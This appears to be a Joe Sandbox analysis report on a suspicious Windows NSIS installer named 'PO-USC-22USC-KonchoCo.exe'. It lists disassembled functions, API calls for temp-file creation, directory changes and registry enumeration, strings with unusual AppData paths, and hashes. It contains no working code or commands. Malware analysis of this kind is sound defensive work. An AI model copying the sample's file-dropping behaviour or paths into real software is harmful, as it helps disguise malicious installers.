Instruction ID: 2238e0f1a46f5e25e3951852f43a11dddaa5b7c7f32292af2b6637a080077407
Opcode Fuzzy Hash: bea2c3dfad6db3553b24c87bd1a60070de232aee380c5cee9c100d0800ee2260
Instruction Fuzzy Hash: DFF0FC30601119A7CB14BB68DD0EFAB375C9B01704F10847AA646F10D0EB789664CF98

Uniqueness

Uniqueness Score: -1.00%

Function 004061A1 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 37
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 004061BF
GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,00403643,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040392F), ref: 004061DA

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 004061A6
nsa, xrefs: 004061AE

Memory Dump Source

Source File: 00000000.00000002.1702485461.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1702434670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702563174.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704346344.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704346344.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO-USC-22USC-KonchoCo.jbxd

Similarity

API ID: CountFileNameTempTick
String ID: C:\Users\user\AppData\Local\Temp\$nsa
API String ID: 1716503409-678247507
Opcode ID: ca4f867381b256d976a036b4ee2479ffffcb38332db50c9e5a73bf50e74bc53e
Instruction ID: d5af49f5aac0e4cb02feadf6e990f33ccb34da23aa7fbf3522b8764b63faf6c0
Opcode Fuzzy Hash: ca4f867381b256d976a036b4ee2479ffffcb38332db50c9e5a73bf50e74bc53e
Instruction Fuzzy Hash: 90F09076701204BFEB008F59DD05E9EB7BCEBA5710F11803EF901F7240E6B49A648764

Uniqueness

Uniqueness Score: -1.00%

Function 004015C6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00405FFC: CharNextW.USER32(?,?,00425750,?,00406070,00425750,00425750,74DF3420,?,74DF2EE0,00405DAE,?,74DF3420,74DF2EE0,"C:\Users\user\Desktop\PO-USC-22USC-KonchoCo.exe"), ref: 0040600A
Part of subcall function 00405FFC: CharNextW.USER32(00000000), ref: 0040600F
Part of subcall function 00405FFC: CharNextW.USER32(00000000), ref: 00406027

GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161F

Part of subcall function 00405BD6: CreateDirectoryW.KERNEL32(0042C800,?), ref: 00405C18

SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Roaming\brosy\udrulnings\Depravingly238\Schokker\Alkoholeksperter\styrtning\Tedeummernes,?,00000000,000000F0), ref: 00401652

Strings

C:\Users\user\AppData\Roaming\brosy\udrulnings\Depravingly238\Schokker\Alkoholeksperter\styrtning\Tedeummernes, xrefs: 00401645

Memory Dump Source

Source File: 00000000.00000002.1702485461.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1702434670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702563174.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704346344.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704346344.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO-USC-22USC-KonchoCo.jbxd

Similarity

API ID: CharNext$Directory$AttributesCreateCurrentFile
String ID: C:\Users\user\AppData\Roaming\brosy\udrulnings\Depravingly238\Schokker\Alkoholeksperter\styrtning\Tedeummernes
API String ID: 1892508949-2643801205
Opcode ID: aa5dd310b5d70740701a2a3e4b5f3b448a7aae78f9a2a95781e07c92bd5766b4
Instruction ID: 68e4a3e0657f1f56d5d8600c1d99eb964219fead50354605c61944b677c9a350
Opcode Fuzzy Hash: aa5dd310b5d70740701a2a3e4b5f3b448a7aae78f9a2a95781e07c92bd5766b4
Instruction Fuzzy Hash: DD11BE31404214ABCF20AFB5CD0099F36B0EF04368B25493FE946B22F1DA3E4A819B5E

Uniqueness

Uniqueness Score: -1.00%

Function 00406059 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00406682: lstrcpynW.KERNEL32(?,?,00000400,004037B7,00428A60,NSIS Error,?,00000008,0000000A,0000000C), ref: 0040668F

Part of subcall function 00405FFC: CharNextW.USER32(?,?,00425750,?,00406070,00425750,00425750,74DF3420,?,74DF2EE0,00405DAE,?,74DF3420,74DF2EE0,"C:\Users\user\Desktop\PO-USC-22USC-KonchoCo.exe"), ref: 0040600A
Part of subcall function 00405FFC: CharNextW.USER32(00000000), ref: 0040600F
Part of subcall function 00405FFC: CharNextW.USER32(00000000), ref: 00406027

lstrlenW.KERNEL32(00425750,00000000,00425750,00425750,74DF3420,?,74DF2EE0,00405DAE,?,74DF3420,74DF2EE0,"C:\Users\user\Desktop\PO-USC-22USC-KonchoCo.exe"), ref: 004060B2
GetFileAttributesW.KERNELBASE(00425750,00425750,00425750,00425750,00425750,00425750,00000000,00425750,00425750,74DF3420,?,74DF2EE0,00405DAE,?,74DF3420,74DF2EE0), ref: 004060C2

Strings

PWB, xrefs: 0040605F

Memory Dump Source

Source File: 00000000.00000002.1702485461.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1702434670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702563174.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704346344.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704346344.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO-USC-22USC-KonchoCo.jbxd

Similarity

API ID: CharNext$AttributesFilelstrcpynlstrlen
String ID: PWB
API String ID: 3248276644-4275379341
Opcode ID: 8ac32a27a18f4c2dd493eafaed9bce6c13b36ca5a95e32c2f60d88480e43d1b4
Instruction ID: c6e62d849c1808a59ce2984a64bb42424f7e4e7bb9f9a1371c2689eace45329e
Opcode Fuzzy Hash: 8ac32a27a18f4c2dd493eafaed9bce6c13b36ca5a95e32c2f60d88480e43d1b4
Instruction Fuzzy Hash: 17F04426144E6219D632723A0C05EAF26148F82354B57463FF853B22D1DF3C8D62C17E

Uniqueness

Uniqueness Score: -1.00%

Function 004071D5 Relevance: 5.2, APIs: 4, Instructions: 236COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1702485461.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1702434670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702563174.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704346344.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704346344.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO-USC-22USC-KonchoCo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5aa4d090f2ad8984d83f4f4e641c2e75da78772a5538c6e641319c1bffeb23fb
Instruction ID: 5108979c3f50e514b4d7e1fb6dd8ed840f295859cf3be547aab63c341a9fbe83
Opcode Fuzzy Hash: 5aa4d090f2ad8984d83f4f4e641c2e75da78772a5538c6e641319c1bffeb23fb
Instruction Fuzzy Hash: 8BA14471E04228DBDF28CFA8C8446ADBBB1FF44305F14856AD856BB281C7786A86DF45

Uniqueness

Uniqueness Score: -1.00%

Function 004073D6 Relevance: 5.2, APIs: 4, Instructions: 208COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1702485461.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1702434670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702563174.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704346344.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704346344.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO-USC-22USC-KonchoCo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8d5ea1f57b3c7a51107eeb32950adad6d0a1e952e0bb086014bf19e576e1a16a
Instruction ID: e1ca38fbe1868b0530a5cca2aefb0608b46060051e5a62990b8a86f9073b7715
Opcode Fuzzy Hash: 8d5ea1f57b3c7a51107eeb32950adad6d0a1e952e0bb086014bf19e576e1a16a
Instruction Fuzzy Hash: 61912370D04228CBDF28CF98C8547ADBBB1FF44305F14856AD856BB291C778AA86DF45

Uniqueness

Uniqueness Score: -1.00%

Function 004070EC Relevance: 5.2, APIs: 4, Instructions: 205COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1702485461.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1702434670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702563174.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704346344.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704346344.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO-USC-22USC-KonchoCo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2a4d9994a082143c1c144eb36683b4c65f38247d7a35d367480abefccda07661
Instruction ID: c8babd12d4b9043659ede3bd230c10fd4be49189821a01af26e4b19fb55261c2
Opcode Fuzzy Hash: 2a4d9994a082143c1c144eb36683b4c65f38247d7a35d367480abefccda07661
Instruction Fuzzy Hash: B1813571D04228DBDF24CFA8C8847ADBBB1FF44305F24856AD456BB281C778AA86DF45

Uniqueness

Uniqueness Score: -1.00%

Function 00406BF1 Relevance: 5.2, APIs: 4, Instructions: 198COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1702485461.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1702434670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702563174.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704346344.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704346344.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO-USC-22USC-KonchoCo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b14ce6b3d8018a6f0b050b5be2694dad1ee6778a4c7b40431f4b258f42aa93ca
Instruction ID: 70604387997e4686e0750d9790b47f8334db0f7ece30ebb4bbc07469160fd387
Opcode Fuzzy Hash: b14ce6b3d8018a6f0b050b5be2694dad1ee6778a4c7b40431f4b258f42aa93ca
Instruction Fuzzy Hash: A4816571D04228DBDF24CFA8C8447ADBBB0FF44315F20856AD856BB281C7786A86DF45

Uniqueness

Uniqueness Score: -1.00%

Function 0040703F Relevance: 5.2, APIs: 4, Instructions: 180COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1702485461.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1702434670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702563174.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704346344.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704346344.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO-USC-22USC-KonchoCo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e36820fe09b78ea4b76e3bf6ab2fb301930f737046964227b4143800bf5a8c7d
Instruction ID: 95d77a19c0962547fc3f67c13c4944abdc30b9b20558c44938f244593de0d4a6
Opcode Fuzzy Hash: e36820fe09b78ea4b76e3bf6ab2fb301930f737046964227b4143800bf5a8c7d
Instruction Fuzzy Hash: 49713471D04228CBDF24CFA8C8847ADBBB1FF48305F15806AD856BB281C7386986DF45

Uniqueness

Uniqueness Score: -1.00%

Function 0040715D Relevance: 5.2, APIs: 4, Instructions: 170COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1702485461.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1702434670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702563174.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704346344.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704346344.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO-USC-22USC-KonchoCo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 06ef8f5a1822f0b757ae31e3b83f809751af444a1e9c2dfe7d230d3dce02f925
Instruction ID: 33b9de73c5357426475d1ecb6718d507a7f793f52192090568aa5f1be2fe3f26
Opcode Fuzzy Hash: 06ef8f5a1822f0b757ae31e3b83f809751af444a1e9c2dfe7d230d3dce02f925
Instruction Fuzzy Hash: D8714671E04228CBDF28CF98C8847ADBBB1FF44305F15856AD856BB281C7786986DF45

Uniqueness

Uniqueness Score: -1.00%

Function 004070A9 Relevance: 5.2, APIs: 4, Instructions: 168COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1702485461.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1702434670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702563174.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704346344.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704346344.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO-USC-22USC-KonchoCo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cfd14bdf320e39a62d2c2df30edf7cb1e1c63a24431ff8987f761f3d68dc011c
Instruction ID: eebb37c65e2131d6119e05978ba22ffeb7e1a1a57c5d17d20a151e235b5fbeda
Opcode Fuzzy Hash: cfd14bdf320e39a62d2c2df30edf7cb1e1c63a24431ff8987f761f3d68dc011c
Instruction Fuzzy Hash: DD714771E04228DBEF28CF98C8447ADBBB1FF44305F15816AD856BB281C7786A86DF45

Uniqueness

Uniqueness Score: -1.00%

Function 0040347E Relevance: 4.6, APIs: 3, Instructions: 101COMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 00403492

Part of subcall function 004035FD: SetFilePointer.KERNELBASE(00000000,00000000,00000000,004032FB,?), ref: 0040360B

SetFilePointer.KERNELBASE(00000000,00000000,?,00000000,004033A8,00000004,00000000,00000000,?,?,00403322,000000FF,00000000,00000000,00008001,?), ref: 004034C5
SetFilePointer.KERNELBASE(?,00000000,00000000,00414EF0,00004000,?,00000000,004033A8,00000004,00000000,00000000,?,?,00403322,000000FF,00000000), ref: 004035C0

Memory Dump Source

Source File: 00000000.00000002.1702485461.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1702434670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702563174.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704346344.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704346344.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO-USC-22USC-KonchoCo.jbxd

Similarity

API ID: FilePointer$CountTick
String ID:
API String ID: 1092082344-0
Opcode ID: 1344b17e1481b80582bdb0ed23b8c3804af25e72a501c03e477dd398e9b7707c
Instruction ID: 0007fe48f9bd4e0bdf6fbdcb7c574e60e63cda3bf49c02497359f5fe5cde5340
Opcode Fuzzy Hash: 1344b17e1481b80582bdb0ed23b8c3804af25e72a501c03e477dd398e9b7707c
Instruction Fuzzy Hash: C7319172600215EBC7309F29EE848163BADF744356755023BE501B26F1CBB5AE42DB9D

Uniqueness

Uniqueness Score: -1.00%

Function 004025A3 Relevance: 4.5, APIs: 3, Instructions: 47registryCOMMON

Download Yara Rule

APIs

RegEnumKeyW.ADVAPI32(00000000,00000000,?,000003FF), ref: 004025D6
RegEnumValueW.ADVAPI32(00000000,00000000,?,?), ref: 004025E9
RegCloseKey.ADVAPI32(?,?,?,distributed\Ristingets\,00000000,00000011,00000002), ref: 00402602

Memory Dump Source

Source File: 00000000.00000002.1702485461.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1702434670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702563174.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704346344.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704346344.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO-USC-22USC-KonchoCo.jbxd

Similarity

API ID: Enum$CloseValue
String ID:
API String ID: 397863658-0
Opcode ID: d7c3bcff9e3486ffb53bc3915b5cff87963c4f43fcbf315e35984deb84fc55ed
Instruction ID: 0e7c906900fe31acaf330cad7c7adc7318663c551a7f251ed3955534a0ac5e15
Opcode Fuzzy Hash: d7c3bcff9e3486ffb53bc3915b5cff87963c4f43fcbf315e35984deb84fc55ed
Instruction Fuzzy Hash: 3D017171904205ABEB149F949E58AAF7678FF40308F10443EF505B61C0DBB84E41976D

Uniqueness

Uniqueness Score: -1.00%

Function 00403376 Relevance: 3.1, APIs: 2, Instructions: 88COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(00008001,00000000,00000000,00000000,00000000,?,?,00403322,000000FF,00000000,00000000,00008001,?), ref: 0040339B

Memory Dump Source

Source File: 00000000.00000002.1702485461.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1702434670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702563174.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704346344.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704346344.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO-USC-22USC-KonchoCo.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: 3d500f412808721b8c87be071932eede801725a1d128c96ac4c777ed30e32dcd
Instruction ID: 810e563441ec60ddb2e304251acab09d4dc6a46a8481b8ea59e7f14a092257d1
Opcode Fuzzy Hash: 3d500f412808721b8c87be071932eede801725a1d128c96ac4c777ed30e32dcd
